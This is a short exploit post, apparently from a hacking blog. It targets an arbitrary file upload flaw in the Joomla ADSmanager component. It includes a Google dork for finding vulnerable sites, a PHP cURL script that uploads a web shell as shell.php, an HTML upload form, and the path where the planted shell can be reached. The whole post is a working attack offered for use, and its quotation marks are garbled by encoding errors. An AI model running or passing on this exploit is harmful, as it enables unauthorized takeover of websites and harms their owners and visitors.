Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

chmood

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :
<?php
$urlΒ =Β β€œblabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”;Β // put URL Here
$postΒ =Β array
(
β€œfile” =>Β β€œ@shell.jpg”,
β€œname” =>Β β€œshell.php”
);
$chΒ =Β curl_initΒ (β€œ$urlβ€œ);
curl_setoptΒ ($ch,Β CURLOPT_RETURNTRANSFER,Β 1);
curl_setoptΒ ($ch,Β CURLOPT_FOLLOWLOCATION,Β 1);
curl_setoptΒ ($ch,Β CURLOPT_USERAGENT,Β β€œMozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0β€³);
curl_setoptΒ ($ch,Β CURLOPT_CONNECTTIMEOUT,Β 5);
curl_setoptΒ ($ch,Β CURLOPT_SSL_VERIFYPEER,Β 0);
curl_setoptΒ ($ch,Β CURLOPT_SSL_VERIFYHOST,Β 0);
curl_setoptΒ ($ch,Β CURLOPT_POST,Β 1);
@curl_setoptΒ ($ch,Β CURLOPT_POSTFIELDS,Β $post);
$dataΒ =Β curl_execΒ ($ch);
curl_closeΒ ($ch);
echoΒ $data;
?>
#CSRF :
<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>

Acces Shell: site.com/tmp/plupload/shell.php


Komentar